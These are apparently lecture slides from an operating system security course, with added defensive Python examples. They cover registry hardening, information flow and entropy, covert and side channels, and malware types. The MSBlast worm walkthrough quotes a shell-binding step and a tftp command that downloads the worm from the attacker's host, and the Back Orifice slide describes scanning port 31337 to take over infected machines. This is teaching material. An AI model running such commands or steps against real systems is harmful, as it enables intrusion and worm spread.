INSE 6130 Operating System Security
Odds and Ends
Prof. Lingyu Wang
Outline
Registry Security
Embedded and Real-Time OS Security
Information Flow
The Phantom Menace
Review for Final Exam
Registry
What is the registry?
Configuration data stored in a hierarchical database
Replacement of .ini, .sys, and .com configuration files
A tree with five root keys:
HKEY_LOCAL_MACHINE: hardware/OS data of this computer
HKEY_CLASSES_ROOT: OLE and file-class association data
HKEY_CURRENT_USER: profile for the user logged on interactively
HKEY_USERS: active user profiles of non-remote users
HKEY_CURRENT_CONFIG: hardware profile
Hives (trees rooted at the top):
DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config, and ntuser.dat in C:\Documents and Settings\administrator
http://msdn.microsoft.com/en-us/library/windows/desktop/ms724871(v=vs.85).aspx
Registry Best Practice
One incorrect edit to the registry can crash the operating system
If you are not completely sure about what you are doing, then better don't do it
Back up before you modify it:
Use the backup utility (Accessories -> System Tools)
Export/import registry hives
Access Control on Registry
What you can do in regedit (“can” does not mean you should):
Grant full control/ownership of a registry key
Assign (customized) permissions to a registry key to users or groups
Audit users’/groups’ activity on a registry key
Restricting accesses:
Local accesses: you can only make it inconvenient
Remote accesses: shouldn’t be given in most cases
Domain controllers have accesses
Registry Hacks for Hardening OS
E.g., prevent NTLM password hashes
XP and Windows 2000 use Kerberos; the NTLM hash is there for backwards compatibility
NTLM hashes can be easily broken by RainbowCrack
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
Win2K: Add NoLMHash = 1
XP: Value name: NoLMHash, Data type: REG_DWORD, Radix: Decimal, Value data: 1
E.g., prevent (SYN) DoS attacks in W2k
The connection responses time out more quickly in the event of a SYN attack
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Key: SynAttackProtect, Value: 0, 1, 2 (default to best protection)
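The two hardening values above are easiest to audit from an exported hive rather than by clicking through regedit. The script below is an added example (not part of the course slides): it parses the text format that regedit's Export produces and checks the NoLMHash and SynAttackProtect values. The sample export is constructed for the demo, the key paths are the ones given on the slides, and treating 2 as the strongest SynAttackProtect setting is this example's assumption.

```python
"""Audit an exported registry hive for the two hardening values on the slides.

Added example (not from the course). Parses regedit's export format
(Windows Registry Editor Version 5.00) and checks NoLMHash and SynAttackProtect.
"""
import re

# Expected hardening settings, keyed by (registry key, value name).
# Key paths are the ones on the slides; SynAttackProtect = 2 is assumed to be
# the strongest of the three settings listed there.
EXPECTED = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa", "NoLMHash"): 1,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services", "SynAttackProtect"): 2,
}

# Constructed sample export: NoLMHash already set, SynAttackProtect still at 0.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000001
"Security Packages"=hex(7):6b,00,65,00,72,00,62,00,65,00,72,00,6f,00,73,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]
"SynAttackProtect"=dword:00000000
"""

_KEY_RE = re.compile(r"^\[(.+)\]$")
_DWORD_RE = re.compile(r'^"(.+?)"=dword:([0-9a-fA-F]{8})$')


def parse_reg(text):
    """Return {(key_path, value_name): int} for every REG_DWORD in a .reg export.

    Other value types (hex(7), strings, ...) are skipped on purpose: the audit
    only needs the DWORD switches, and a parser that ignores what it does not
    understand cannot mis-read an unusual line as a setting.
    """
    values = {}
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        key_match = _KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        dword_match = _DWORD_RE.match(line)
        if dword_match and current_key is not None:
            name, hex_value = dword_match.groups()
            values[(current_key, name)] = int(hex_value, 16)
    return values


def audit(values, expected=EXPECTED):
    """List (key, name, found, expected) for each setting missing or weaker
    than expected; an empty list means the export passes."""
    findings = []
    for (key, name), want in expected.items():
        found = values.get((key, name))
        if found is None or found < want:
            findings.append((key, name, found, want))
    return findings


if __name__ == "__main__":
    for key, name, found, want in audit(parse_reg(SAMPLE_REG)):
        print(f"{key}\\{name}: found {found}, expected {want}")
```

Run it against the export from "Export/import registry hives" above; a missing value is reported as `None`, which distinguishes "never set" from "set too low".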
Where Are Embedded/Real-time OS?
US Army's Crusader: RTOS processes ballistic calculations, the graphical user interface and real-time equipment control systems
Bombardier Challenger 300: RTOS in the adaptive flight display systems
F-35: RTOS powers a portion of the Panoramic Cockpit Display subsystem
http://www.lynuxworks.com/rtos/rtos-178.php
Why Are Such Systems Different?
A time constraint on an operation MUST be met regardless of the system load
Not the case on our PCs
A good example: Anti-lock braking system (ABS)
System reliability, availability, etc.
Availability = MTTF / (MTTF + MTTR), where MTTF is the mean time to failure and MTTR the mean time to recovery
The Standard for RTOS
DO-178B: "Software Considerations in Airborne Systems and Equipment Certification"
A de facto standard for certifying aviation software, such as RTOS
Software systems are categorized by the effects of their failures:
A: Catastrophic - Failure may cause a crash
B: Hazardous - Failure has a large negative impact on safety or performance, or reduces the ability of the crew to operate the plane
C: Major - Failure is significant, but has a lesser impact than a Hazardous failure (e.g., leads to passenger discomfort)
D: Minor - Failure is noticeable, but has a lesser impact than a Major failure (e.g., causing passenger inconvenience or a flight plan change)
E: No Effect - Failure has no impact on safety, aircraft operation, or crew workload
The development process of a software system is subject to different requirements based on its level
LynxOS-178 RTOS
An RTOS certifiable to DO-178B level A
Provides security through fixed partitions of resources (time and memory)
System events in one partition cannot interfere with events in another
E.g., CD player and ABS
Safety and Security
Common Criteria (CC)
A standard (ISO/IEC 15408) for computer security
A framework for specifying security requirements and implementing, claiming and testing such requirements
DO-178B and CC
Software developed to DO-178B Level A standards will map closely to either an EAL 4 or 5
CC basically requires a small kernel capable of controlling information flow and maintaining data isolation
DO-178B kernel space partitioning provides both
From DO-178B to EAL 7: mostly formal methods
http://www.csds.uidaho.edu/comparison/stc2002.pdf
What We Already Know
Information flows when:
I write to slides (push)
You read slides (pull)
You read what I have written
Information flow policy in BLP and Biba:
BLP: flow up (e.g., unclassified to secret)
Biba: flow down (e.g., high integrity to low integrity)
Chinese Wall: flow inside a CD (except sanitized)
Question: How do we model/measure “information flow”?
Answer: Entropy
H(X) = - Σ_i p(X=x_i) log2 p(X=x_i)
Measures the uncertainty of X
How many bits are required to represent X
Example: X = 0 or 1, equally likely
H(X) = - ( p(X=0) log2 p(X=0) + p(X=1) log2 p(X=1) ) = - (1/2 log2 1/2 + 1/2 log2 1/2) = 1
Y = 1 certainly; Y = 0 impossible
H(Y) = - ( p(Y=1) log2 p(Y=1) ) = - 1 log2 1 = 0
The Intuition
Question: Do you need to know entropy in the final exam?
Before today, no clue. Answer: Yes 50%, No 50%; entropy 1
Right now, likely. Answer: Yes 60%, No 40%; entropy 0.97
After the final exam… Answer: Yes 100% or 0%; entropy 0
Seeing the slides, or the exam, decreases your uncertainty (entropy) about the question
Information flows to you from the slides (exam)
More information flows to you from the exam than from the slides
Example 1
Suppose X can be either 0 or 1, equally likely, so H(X) = 1
If: value assignment Y := X (X: exam question; Y: my expression)
Then: H(X|Y) = 0; knowing Y gives you X (looking at my expression gives you the exam question)
Value assignment causes information flow X → Y
What if the value assignment is Y := 1? (I am expressionless)
Example 2
Suppose 0 ≤ X ≤ 7, equally likely, so H(X) = –8 (1/8) log2 (1/8) = 3
Z = 1, 2 or 3, equally likely
If: Y := X + Z
Then: knowing Y, X can have at most 3 values
H(X | Y) < –3 (1/3) log2 (1/3) = log2 3 < 3
Information flows X → Y
Example 3
Suppose X equally likely to be either 0 or 1; Y equally likely to be either true or false; H(X) = 1, H(Y) = 1
If: X > 0 ? Y := true : Y := false
Then: H(X|Y) = 0
Information flows X → Y
Implicit information flow: no direct value assignment between X and Y
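The three examples can be checked mechanically: enumerate the program over the input distributions, build the joint distribution of the secret X and the output Y, and compute H(X) and H(X|Y). The code below is an added example (not from the slides); the helper names and the generic `information_flow` routine are this example's own, and the input distributions are the constructed ones from the examples (uniform bits, 0..7, 1..3). It also evaluates the 60/40 exam-question entropy from the intuition slide.

```python
"""Measuring information flow with entropy (added example, not from the slides)."""
from collections import defaultdict
from itertools import product
from math import log2


def entropy(dist):
    """H(X) = -sum_i p(x_i) log2 p(x_i), for dist = {value: probability}."""
    return -sum(p * log2(p) for p in dist.values() if p > 0)


def conditional_entropy(joint):
    """H(X|Y) = sum_y p(y) H(X|Y=y), for joint = {(x, y): probability}."""
    p_y = defaultdict(float)
    for (_, y), p in joint.items():
        p_y[y] += p
    total = 0.0
    for y0, py in p_y.items():
        given_y = {x: p / py for (x, y), p in joint.items() if y == y0}
        total += py * entropy(given_y)
    return total


def information_flow(x_dist, other_dists, program):
    """Run program(x, **others) over every input combination.

    x_dist and each entry of other_dists are {value: probability}; inputs are
    assumed independent. Returns (H(X), H(X|Y)) where Y is the program output;
    H(X) - H(X|Y) is the number of bits that flow from X to Y.
    """
    names = list(other_dists)
    joint = defaultdict(float)
    for x, px in x_dist.items():
        for combo in product(*(other_dists[n].items() for n in names)):
            prob, kwargs = px, {}
            for name, (value, pv) in zip(names, combo):
                kwargs[name] = value
                prob *= pv
            joint[(x, program(x, **kwargs))] += prob
    return entropy(x_dist), conditional_entropy(joint)


def uniform(values):
    return {v: 1.0 / len(values) for v in values}


def slide_examples():
    """Explicit assignment, constant assignment, assignment plus noise, implicit flow."""
    bit = uniform([0, 1])
    return {
        "Y := X": information_flow(bit, {}, lambda x: x),
        "Y := 1": information_flow(bit, {}, lambda x: 1),           # expressionless: no flow
        "Y := X + Z": information_flow(uniform(range(8)), {"z": uniform([1, 2, 3])},
                                       lambda x, z: x + z),
        "Y := X > 0": information_flow(bit, {}, lambda x: x > 0),   # implicit flow via the branch
    }


if __name__ == "__main__":
    print("exam question, 60/40:", round(entropy({"yes": 0.6, "no": 0.4}), 2))
    for label, (hx, hx_given_y) in slide_examples().items():
        print(f"{label:12s} H(X)={hx:.3f}  H(X|Y)={hx_given_y:.3f}  flow={hx - hx_given_y:.3f} bits")
```

For Y := X + Z the exact value comes out at about 1.36 bits, below the slide's bound of log2 3 ≈ 1.58, because the sums at the ends of the range (Y = 1 or Y = 10) pin X down completely.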
Confinement Problem
Prevent leaking confidential information
Easy: if processes only communicate via known communication channels
Isolation
Virtual machines: the OS runs on an emulated ‘computer’, restricted by the VM
Sandboxing: a virtual machine for a process, instead of an OS
Figure: a Linux guest inside VMware on Windows on hardware (virtual machine); an applet inside a JVM on Windows on hardware (sandbox)
Covert Channel
Isolation only prevents direct communication via known channels
A covert channel is a communication channel not intended for communication
Storage channel: shared storage-based
Timing channel: time-based
Example 1 – Storage Channel
Processes p, q not allowed to communicate
But they share a file system
They set up a storage channel:
Agree on two file names, /tmp001.txt and /tmp002.txt
If p wants to send q a bit 1, it creates the file /tmp001.txt; otherwise it creates /tmp002.txt
q records a bit based on the file name, and then deletes the file, so p can send the next bit
Figure: p creates /tmp001.txt and q reads bit 1; p creates /tmp002.txt and q reads bit 0
Example 2 – Timing Channel
Timing attack on a cryptosystem
Modular exponentiation algorithm (square and multiply)
Computes x = a^z mod n, where z = z_0 … z_(k–1) are the bits of the exponent (z_0 the least significant)
x := 1; atmp := a;
for i := 0 to k–1 do begin
    if z_i = 1 then
        x := (x * atmp) mod n;
    atmp := (atmp * atmp) mod n;
end
result := x;
Each 1 bit of z results in two multiplications
Run time will be proportional to the number of 1 bits
Example 3 – Timing Channel
Two processes set up a timing channel:
To send a 0 bit: p relinquishes the CPU as soon as it gets the CPU
To send a 1 bit: p uses the CPU for the full time slot
q determines a bit by seeing how quickly it gets the CPU
Figure: timelines of p getting and relinquishing the CPU and q then getting it, one for bit 1 and one for bit 0
Noise/Mitigation of Covert Channel
When many processes share the same resource, the covert channel will be noisy
Noise will reduce the capacity of a covert channel
But does not remove it (remember, any communication channel is noisy)
Mitigation of covert channel: obscure resource usage
Devote a uniform, fixed amount of resources to each process, even if some resources are wasted
Crypto example, CPU example (e.g., RTOS)
Inject randomness into allocation/use of resources
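The "crypto example" of the fixed-resource mitigation is the square-and-multiply routine from Example 2 above. The code below is an added example (not from the slides): rather than measuring wall-clock time it counts modular multiplications, which is what the run time is proportional to, and puts the slide's algorithm beside a variant that does the same work for every bit. The function names and the small constructed exponents are this example's own. Python integers are not constant-time, so the second routine illustrates the uniform-work structure, not a production constant-time implementation.

```python
"""Square-and-multiply leaks the exponent's 1 bits; fixed work hides them.

Added example, not from the slides. Multiplications are counted instead of timed.
"""


def square_and_multiply(a, z, n):
    """Right-to-left square-and-multiply from the slide: x = a^z mod n.

    Returns (x, multiplications). Only the bits of z that are 1 trigger the
    extra `x * atmp`, so the count (and the run time) reveals the Hamming
    weight of z and, with finer-grained timing, each individual bit.
    """
    x, atmp, mults = 1, a % n, 0
    for bit in bin(z)[2:][::-1]:  # z_0 (least significant) first, as on the slide
        if bit == "1":
            x = (x * atmp) % n
            mults += 1
        atmp = (atmp * atmp) % n
        mults += 1
    return x, mults


def fixed_work_exponentiation(a, z, n):
    """Same result, but the work per bit does not depend on the bit's value.

    This is the slide's mitigation (a uniform, fixed amount of resources, even
    if some are wasted): every iteration performs one multiplication and one
    squaring, and the multiplication result is kept only when the bit is 1.
    The selection is arithmetic rather than an `if`, so the same instructions
    run either way. (Python's big integers are still not constant-time.)
    """
    x, atmp, mults = 1, a % n, 0
    for bit in bin(z)[2:][::-1]:
        b = int(bit)
        candidate = (x * atmp) % n         # always computed, possibly discarded
        x = b * candidate + (1 - b) * x    # keep candidate iff the bit is 1
        atmp = (atmp * atmp) % n
        mults += 2
    return x, mults


def multiplication_counts(exponents, n=1000003, base=5):
    """{z: (leaky count, fixed-work count)} for exponents of the same bit length.
    n and base are constructed demo values, not real parameters."""
    return {z: (square_and_multiply(base, z, n)[1], fixed_work_exponentiation(base, z, n)[1])
            for z in exponents}


if __name__ == "__main__":
    # Constructed 8-bit exponents with 1, 4 and 8 one-bits respectively.
    for z, (leaky, fixed) in multiplication_counts([0b10000000, 0b10101010, 0b11111111]).items():
        print(f"z={z:08b}: square-and-multiply={leaky} mults, fixed-work={fixed} mults")
```

The leaky count is k + (number of 1 bits), so an observer who can time the whole operation learns the Hamming weight of z; the fixed-work count is 2k regardless of z, at the cost of up to k wasted multiplications.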
Make Positive Use of Covert Channel
Tracking anonymous P2P VoIP calls
The connection between Alice and Bob is mixed with many others in an anonymizing network:
Headers modified
Payload encrypted
Suppose we suspect Alice is talking to Bob; how do we prove it?
Make Use of Covert Channel Cont’d
Track the call by transmitting a watermark through a timing channel based on inter-packet delays
Figure: on Alice's side the watermark 1011 is added by shifting packets in time; on Bob's side the watermark is detected from the inter-packet delays (Bit 1 / Bit 0)
Question: why do we always move the packet to the right?
Web-based Application
Client – Internet – Server, with encrypted traffic
Advantages:
Less client-side resources
Easier to deliver and maintain
Characteristics:
Encrypted traffic
Low entropy inputs
Rich & diverse resource objects
Stateful communications
Side-Channel Attack
Size and directions of packets between users and a search engine (client – Internet – server, encrypted traffic)
User input and observed directional packet sizes:
a: 801→, ←54, ←509, 60→
00: 812→, ←54, ←505, 60→, 813→, ←54, ←507, 60→
Fixed pattern: identifies the input string
b-byte request and s-byte response sizes: indicator of the input itself
Side-Channel Attack Cont’d
s value for each character entered as the first keystroke:
a 509  b 504  c 502  d 516  e 499  f 504  g 502
h 509  i 492  j 517  k 499  l 501  m 503  n 488
o 509  p 525  q 494  r 498  s 488  t 494
u 503  v 522  w 516  x 491  y 502  z 501
s value after the second keystroke (rows: first keystroke with its s value; columns: second keystroke):
           a    b    c    d
a (509)  487  493  501  497
b (504)  516  488  482  481
c (502)  501  488  473  477
d (516)  543  478  509  499
Unique s value: 12 out of 16 (second keystroke alone); 16 out of 16 (first and second keystroke together)
In reality, it may take more than two keystrokes to uniquely identify an input string
Leaks out users’ private information: the input string
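The tables above can be turned into a measurement of the leak and of a countermeasure. The code below is an added example (not from the slides, nor from the paper they summarize): the s values are copied from the tables, while the uniqueness metric, the padding scheme and the function names are this example's own. It counts how many two-letter inputs an eavesdropper can pin down from the response sizes, with and without padding every response up to a multiple of 64 bytes.

```python
"""Quantify the packet-size side channel from the slides and test padding.

Added example, not from the slides. s values are the ones in the tables above.
"""
from collections import Counter

FIRST = {  # s value of the response after the first keystroke
    "a": 509, "b": 504, "c": 502, "d": 516, "e": 499, "f": 504, "g": 502,
    "h": 509, "i": 492, "j": 517, "k": 499, "l": 501, "m": 503, "n": 488,
    "o": 509, "p": 525, "q": 494, "r": 498, "s": 488, "t": 494,
    "u": 503, "v": 522, "w": 516, "x": 491, "y": 502, "z": 501,
}
SECOND = {  # s value after the second keystroke, prefixes a-d, second keys a-d
    "a": {"a": 487, "b": 493, "c": 501, "d": 497},
    "b": {"a": 516, "b": 488, "c": 482, "d": 481},
    "c": {"a": 501, "b": 488, "c": 473, "d": 477},
    "d": {"a": 543, "b": 478, "c": 509, "d": 499},
}


def observations(pad_to=1):
    """Map each two-letter input to the (first s, second s) an eavesdropper sees.

    pad_to=1 is the unpadded application; a larger value rounds every response
    up to a multiple of pad_to bytes, the simplest padding countermeasure.
    """
    def pad(size):
        return -(-size // pad_to) * pad_to  # ceiling to a multiple of pad_to
    return {first + second: (pad(FIRST[first]), pad(SECOND[first][second]))
            for first in SECOND for second in SECOND[first]}


def uniquely_identified(obs, use_first=True):
    """Number of inputs whose observation is shared with no other input."""
    key = (lambda sizes: sizes) if use_first else (lambda sizes: sizes[1])
    counts = Counter(key(sizes) for sizes in obs.values())
    return sum(1 for sizes in obs.values() if counts[key(sizes)] == 1)


def leak_summary(pad_to=1):
    obs = observations(pad_to)
    return {
        "second_only": uniquely_identified(obs, use_first=False),
        "both": uniquely_identified(obs, use_first=True),
        "total": len(obs),
    }


if __name__ == "__main__":
    for pad_to in (1, 64):
        print(f"pad to multiple of {pad_to}: {leak_summary(pad_to)}")
```

Unpadded, the result reproduces the slide's 12 of 16 and 16 of 16. With 64-byte padding only two inputs stay unique, and those are the ones whose responses straddle a padding boundary, which is why padding to a fixed size, or to coarser blocks, closes the channel further at the cost of extra bandwidth.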
The Phantom Menace
Malicious programs: those that need a host program (Trapdoors, Logic Bombs, Trojan Horses, Viruses) and those that are independent (Worms, Zombies, Rootkits)
Backdoor
Secret entry point into a system
Special user identifier/password that circumvents normal security procedures
Commonly used by developers
Could be included in a compiler (e.g., Ken Thompson)
Example: Back Orifice (BO)
Win98 at DEFCON 6 in 1998, BO2k in 1999
The BO server can be embedded in an executable file; when you run that file, BO silently installs itself as a 122K “ .exe”
Run a BO client, scan the network for port 31337 (ELEET - elite), find any BO server - that machine is yours
Logic Bomb
Embedded in legitimate programs
Activated when specified conditions are met
E.g., presence/absence of some file; particular date/time or particular user
When triggered, typically damages the system
Modify/delete files/disks
Example: “CIA slipped bugs to Soviets”
“In January 1982, President Ronald Reagan approved a CIA plan to sabotage the economy of the Soviet Union through covert transfers of technology that contained hidden malfunctions, including software that later triggered a huge explosion in a Siberian natural gas pipeline”
Rootkit
A set of programs and code that allows a permanent or consistent, undetectable presence on a computer
Hide malicious resources, e.g., processes, files, registry keys, open ports, etc.
Provide hidden backdoor accesses
Simple rootkits: modify user programs (ls, ps), detectable by tools like Tripwire
Sophisticated rootkits: modify the kernel itself, hard to detect from userland
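The reason a user-land rootkit is "detectable by tools like Tripwire" is that replacing ls or ps changes the file's digest against a stored baseline. The code below is an added example (not from the slides and not Tripwire's own code) of that check: it records SHA-256 digests for a directory tree, then reports added, removed and modified files. The demo builds its "binaries" in a temporary directory, so every file and path in it is constructed.

```python
"""A Tripwire-style file integrity check (added example, not Tripwire's code)."""
import hashlib
import os
import tempfile


def fingerprint(path):
    """SHA-256 over the file contents plus its size; a replaced binary changes both."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest(), os.path.getsize(path)


def baseline(root):
    """Return {relative path: fingerprint} for every regular file under root."""
    snapshot = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            snapshot[os.path.relpath(full, root)] = fingerprint(full)
    return snapshot


def verify(root, snapshot):
    """Compare the tree with a stored baseline; returns sorted (status, path) pairs."""
    current = baseline(root)
    findings = []
    for rel in sorted(set(snapshot) | set(current)):
        if rel not in current:
            findings.append(("removed", rel))
        elif rel not in snapshot:
            findings.append(("added", rel))
        elif snapshot[rel] != current[rel]:
            findings.append(("modified", rel))
    return findings


def demo():
    """Build a fake bin directory, baseline it, replace ps, drop a file, verify."""
    with tempfile.TemporaryDirectory() as root:
        for name in ("ls", "ps", "netstat"):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(b"original " + name.encode())  # constructed stand-in for a binary
        snapshot = baseline(root)
        assert verify(root, snapshot) == []  # a clean tree matches its baseline
        with open(os.path.join(root, "ps"), "wb") as fh:
            fh.write(b"patched ps that hides a process")  # simulated rootkit replacement
        with open(os.path.join(root, ".hidden"), "wb") as fh:
            fh.write(b"dropped file")
        return verify(root, snapshot)


if __name__ == "__main__":
    for status, path in demo():
        print(f"{status:8s} {path}")
```

Two caveats follow directly from the slide: the baseline has to live where the rootkit cannot rewrite it (read-only or offline media), and a kernel-level rootkit can feed this checker false file contents, which is why "hard to detect from userland" holds for the sophisticated case.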
Worm
Runs independently; does not require a host program
Propagates a fully working version of itself to other machines
Carries a payload performing hidden tasks: backdoors, spam relays, DDoS agents, …
Phases: Probing, Exploitation, Replication, Payload
Worm Propagation
A worm and a victim: 1: Target probing; 2: Vulnerability exploitation; 3: Replication
A Staged View of Worm Infection
MSBlast Worm (Aug., 2003); Blaster at 192.168.0.1, target (RPC) at 192.168.10.11
1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell
7. Runs TFTP command; “teleports” msblast.exe file (>tftp –I 192.168.0.1 GET msblast.exe)
8. Sends “START msblast.exe” command
9. Runs worm on target!
10. Closes connection
11. Shell closes
Botnet
Zombie: a computer that is secretly installed with a Trojan horse and can be used for attacks
Bots join a specific IRC channel on a server and wait for further commands
The attacker remotely controls the bot
Botnet: a network of zombies controlled by a ‘bot herder’
Consisting of several ten thousands of bots
Usually for malicious purposes
Botnets Cont’d
A botnet is usually for profit:
Distributed Denial-of-Service (DDoS) attacks
Spamming – install SOCKS v4/v5 proxy for spam emails
Sniffing traffic/key logging – e.g., credit card numbers
Spreading new worms/viruses
Ads add-ons, spyware, phishing
Paid for clicking ads (Google AdSense)
Attacking IRC chat networks – clone attack
Manipulating online polls/games
Mass identity theft
How Does a Botnet Work
1. The attacker scans the Internet for unsecured systems that can be compromised
2. The attacker secretly installs zombie agent programs, turning unsecured computers into zombies
3. Zombie agents “phone home” and connect to a master server
4. The attacker sends commands to the master server to launch a DDoS attack against a targeted system
5. The master server sends a signal to the zombies to launch the attack on the targeted system
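Step 3 is the one a network defender can see: many freshly infected hosts connect to the same master server, and with IRC-based control that is many internal sources talking to one external address on an IRC port. The code below is an added example (not from the slides): a detector that groups flow records by destination and flags IRC destinations gathering more internal clients than a site would expect. The flow records, the internal address range, the port list and the client threshold are all constructed choices of this example.

```python
"""Spotting the "phone home" step in flow logs (added example, not from the slides)."""
from collections import defaultdict
import ipaddress

IRC_PORTS = {6667, 6697}  # common IRC ports; a real deployment would tune this list
INTERNAL = ipaddress.ip_network("10.0.0.0/8")  # constructed: the site's own address space

# Constructed flow records: timestamp, src, dst, dst_port, bytes_out
FLOWS = """\
2024-01-01T10:00:01 10.0.1.5 203.0.113.10 6667 412
2024-01-01T10:00:03 10.0.1.9 203.0.113.10 6667 398
2024-01-01T10:00:04 10.0.2.14 203.0.113.10 6667 405
2024-01-01T10:00:07 10.0.3.2 203.0.113.10 6667 410
2024-01-01T10:00:09 10.0.4.77 203.0.113.10 6667 401
2024-01-01T10:00:11 10.0.1.5 198.51.100.7 443 2210
2024-01-01T10:00:12 10.0.1.9 198.51.100.7 443 1890
2024-01-01T10:00:15 10.0.9.1 192.0.2.30 6667 530
2024-01-01T10:00:20 10.0.9.1 192.0.2.30 6667 120
"""


def parse_flows(text):
    """Parse the whitespace-separated records into typed tuples."""
    records = []
    for line in text.splitlines():
        ts, src, dst, port, nbytes = line.split()
        records.append((ts, ipaddress.ip_address(src), ipaddress.ip_address(dst),
                        int(port), int(nbytes)))
    return records


def rendezvous_points(records, min_clients=3, ports=IRC_PORTS):
    """Return {dst_ip: sorted internal sources} for external IRC destinations that
    at least min_clients distinct internal hosts connected to.

    A single employee on IRC produces one client per server; a freshly built
    botnet produces many, all from inside, within a short window. The threshold
    is this example's own choice and would be tuned per site.
    """
    clients = defaultdict(set)
    for _, src, dst, port, _ in records:
        if port in ports and src in INTERNAL and dst not in INTERNAL:
            clients[dst].add(src)
    return {str(dst): sorted(str(s) for s in srcs)
            for dst, srcs in clients.items() if len(srcs) >= min_clients}


if __name__ == "__main__":
    for server, hosts in rendezvous_points(parse_flows(FLOWS)).items():
        print(f"possible C&C server {server}: {len(hosts)} internal hosts {hosts}")
```

In the constructed log the five hosts talking to 203.0.113.10 are flagged, while the single host talking to 192.0.2.30 is not; raising or lowering `min_clients` trades missed small botnets against false alarms from legitimate IRC use.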